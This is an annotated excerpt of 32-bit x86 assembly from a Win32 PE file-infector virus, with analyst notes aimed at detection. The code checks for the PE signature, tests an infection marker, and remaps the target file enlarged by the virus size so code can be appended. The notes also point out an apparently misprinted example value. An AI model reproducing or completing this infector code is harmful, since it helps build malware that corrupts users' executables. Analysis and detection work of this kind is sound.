Win32




;-----------------------------------------------------------------------
; Excerpt from the middle of a Win32 PE file-infector routine
; (32-bit x86, Intel operand order, TASM/MASM-style "dword ptr").
; The routine starts before and continues after this excerpt. The labels
; NoInfect, CloseFile and UnMapFile and the helpers Align, CreateMap and
; MapFile are defined elsewhere and are not shown here.
;
; State on entry (established outside this excerpt):
;   eax = base address of the mapped target file -- presumably the value
;         also held in [ebp+MapAddress]; confirm against preceding code
;   ebp = base register for the code's own variables; every variable and
;         API pointer is reached as [ebp+name]
;
; Analyst notes (detection-relevant, derived from the offsets used):
;   * PE+3Ch is the optional header's FileAlignment field
;     (4-byte signature + 20-byte file header + 24h).
;   * PE+4Ch is optional-header offset 34h, the reserved
;     Win32VersionValue field, which is normally zero. The code uses it
;     as its "already infected" marker, so a non-zero value there is a
;     static anomaly worth flagging.
;   * The page's own "; PE?" comment implies character literals are
;     stored most-significant character first ("EP" matches bytes
;     'P','E',0,0). Under that same convention the marker "CTZA" would
;     appear in a file as the bytes 'A','Z','T','C' -- confirm on a sample.
;   * The file is remapped at (file size + virus_size) passed through
;     Align, so an affected file's size changes accordingly.
;-----------------------------------------------------------------------

        mov esi,[eax+3Ch]                       ; esi = dword at file offset 3Ch (e_lfanew)
        add esi,eax                             ; esi -> PE header inside the mapping
        cmp dword ptr [esi],"EP"                ; PE signature present?
        jnz NoInfect                            ; not a PE file: leave it alone

        cmp dword ptr [esi+4Ch],"CTZA"          ; infection marker already present?
        jz NoInfect                             ; marked: do not process it twice

        push dword ptr [esi+3Ch]                ; save FileAlignment; esi is stale once unmapped

        push dword ptr [ebp+MapAddress]         ; argument: current view base
        call [ebp+_UnmapViewOfFile]             ; API reached through a stored pointer

        push dword ptr [ebp+MapHandle]          ; argument: current mapping handle
        call [ebp+_CloseHandle]

        pop ecx                                 ; ecx = saved FileAlignment

;-----------------------------------------------------------------------
; Summary of the code above:
; EAX holds the address of the mapped file. The PE header pointer is
; read from (MapAddress+3Ch), rebased against the mapping, and kept in
; ESI. The PE signature is verified, then the marker dword at PE offset
; 4Ch is checked to see whether the file was processed before. The File
; Alignment value from the PE header is saved on the stack, the view is
; unmapped and the mapping handle closed, and the saved value is then
; popped into ECX.
;-----------------------------------------------------------------------

        mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; eax = low dword of the file size
        add eax,virus_size                      ; plus the size of the appended code

        call Align                              ; presumably rounds eax up to a multiple of ecx -- body not shown
        xchg ecx,eax                            ; ecx = aligned size (eax takes the old alignment)

        call CreateMap                          ; new mapping, sized from ecx
        or eax,eax                              ; zero return is treated as failure
        jz CloseFile

        mov dword ptr [ebp+MapHandle],eax       ; remember the new mapping handle

        mov ecx,dword ptr [ebp+NewSize]         ; NewSize is not written in this excerpt;
                                                ; presumably stored by CreateMap -- TODO confirm
        call MapFile

        or eax,eax                              ; zero return is treated as failure
        jz UnMapFile

        mov dword ptr [ebp+MapAddress],eax      ; remember the new view base

        mov esi,[eax+3Ch]                       ; re-read e_lfanew from the new view
        add esi,eax                             ; esi -> PE header in the enlarged mapping

;-----------------------------------------------------------------------
; Summary of the code above:
; ECX holds the alignment factor that Align expects; EAX receives the
; file size plus the virus size and comes back aligned. Example from
; the text: with an alignment of 200h, 'Align' returns 12400h. (The
; input is printed as 1234h, which does not round to 12400h; a value
; such as 12345h would -- likely a dropped digit.) The aligned size is
; placed in ECX, CreateMap is called again so the file is mapped at the
; new, larger size, and ESI once more points to the PE header.
;-----------------------------------------------------------------------